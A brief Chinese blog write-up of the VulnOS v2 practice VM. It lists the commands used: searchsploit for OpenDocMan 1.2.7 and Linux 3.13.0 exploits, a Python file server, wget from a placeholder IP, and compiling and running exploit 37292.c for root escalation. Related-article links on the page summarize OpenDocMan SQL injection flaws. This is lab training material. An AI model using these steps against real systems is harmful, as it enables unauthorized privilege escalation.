Vulnosv2 靶机训练

最新推荐文章于 2023-03-05 14:39:51 发布
最新推荐文章于 2023-03-05 14:39:51 发布
阅读量225 收藏
点赞数
分类专栏: 靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43999483/article/details/114283861
版权

参考博客传送门

关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击

searchsploit OpenDocMan 1.2.7

一般存放目录都放在

/usr/share/exploitdb下面

获得低权限用户后 可以考虑Linux内核提权

searchsploit Linux 3.13.0

搭建一个文件服务器

python -m SimpleHTTPServer 6666

下载

wget http://xxx.xxx.xxx.xxx

如果是c类型文件,需要gcc编译
找到gcc

whereis gcc

gcc /usr/bin/gcc -o abc 37292.c

将编译后的文件保存再abc中
调高abc文件权限 chmod
./abc运行该payload 内核提权成功

M@gic_P1g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
opendocman漏洞:不正确访问控制漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 452
opendocman漏洞详情.CVE ID:CVE-2014-1946 OpenDocMan是一款开源基于WEB的文档管理系统。 由于在更新用户的个人资料时“/ signup.php”脚本允许的动作未充分验证,远程身份验证的攻击者可以分配管理权限和完全控制应用程序
opendocman:OpenDocMan-免费PHP文档管理系统DMS
03-11
OpenDocMan 免费PHP文档管理系统DMS OpenDocMan是一个用PHP编写的基于Web的文档管理系统(DMS),旨在符合ISO 17025和OIE文档管理标准。 它具有对文件访问的细粒度控制以及自动安装和升级的功能。 特征 * Upload files using web browser * Control access to files based on department or individual user permissions * Track revisions of documents * Option to send new and updated files through review process * Installs on most web servers with PHP * Set up a reviewal process for al
个人文档管理工具OpenKM安装设置及汉化过程
qq_38566306的博客
04-27 4758
为了更好地管理自己的文档(未必能坚持用下去啊O(∩_∩)O哈哈~),这几天比较了几款免费开源的文档管理工具。其中LogicalDoc安装很顺利,使用也OK,但是社区版的只能预览PDF文件,这就很不爽了。同时,也不具有字典、类别等功能,搜索方式较简单吧——初步印象。OpenDocMan似乎只是文档管理,没有预览功能。国产的几个,限制文件尺寸,不实用。OpenKM一开始尝试了一次,由于不是JDK1.8,安装失败,就放弃了;后来了解到OpenKM支持各种文档的预览,还有字段、类别等功能,甚合我意。折腾了一...
vulnhub VulnOS: 2
箭雨镜屋
12-05 2543
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2280
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
docker-opendocman-fullstack:使用图的全栈 OpenDocMan docker 集群
07-03
#Docker OpenDocMan 全栈与 MySQL 使用图 1 的全栈 OpenDocMan docker 集群 如果您正在寻找预构建的 docker 镜像,请看这里: 此存储库包含构建运行最新版本 OpenDocMan、Apache 2、PHP(容器 1)、MySQL(容器 2)和文件存储(容器 3)的 docker 三容器集群所需的文件。 ###构建您的集群: (需要 docker 客户端(Mac 需要 boot2docker)、 和 docker 主机) “图 -d” 然后你应该有一个正在运行的实例,如果你访问你的容器 IP 地址,你将看到一个管理员登录(管理员/无密码)。 登录后更改管理员密码。 只要不删除文件存储容器,您的数据将被无限存储,包括您的文件数据目录和您的 mysql 数据库文件。
SAP 文档管理系统(DMS) 配置文档
06-18
SAP 文档管理系统(DMS) 配置文档
文档管理系统(DMS)V1.1.rar
06-14
优质个人文档管理系统. 文档管理: 文档检索: 文件夹加密: 文件夹目录调整: 文档目录调整: 附件管理: 标题检测: 与Word的导入导出: 自动同步: 等功能要点..
文档管理系统(OpenDocMan) v1.2.7.1.zip
07-07
OpenDocMan是一个全功能的DMS文档管理系统,遵循ISO 17025/IEC标准。提供自动化安装脚本、自定义主题、插件、check in/out,分部门访问控制,文件调整,细粒度用户访问控制,强大的搜索功能,提供中文支持。 OpenDocMan 1.2.7.1 发布,此版本添加了安全补丁和bug修复;不包括任何的数据库修改;强烈建议所有用户升级!
Vulnhub系列:VulnOSv2
最新发布
Ays.Ie的博客
03-05 457
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
opendocman漏洞‘ajax_udf.php‘多个SQL注入
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 215
opendocman漏洞'ajax_udf.php'多个SQL注入漏洞详情:Bugtraq ID:65775 CVE ID:CVE-2014-1945 OpenDocMan是一款开源基于WEB的文档管理系统。 对通过"add_value" GET参数和"table" GET提交给ajax_udf.php的输入缺少充分过滤,允许攻击者利用漏洞进行SQL注入攻击,可获得敏感数据库信息或控制应用系统。 0 OpenDocMan 1.2.7.1 厂商补丁: OpenDocMan
Vulnhub-靶机-VulnOSv2
qq_43264813的博客
03-01 462
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.1
【甄选靶场】Vulnhub百个项目渗透——项目十四:VulOsv2(CMS利用,工控文件发掘)
人间体佐菲的博客
09-16 851
网络安全,信息安全,网络空间安全,渗透测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值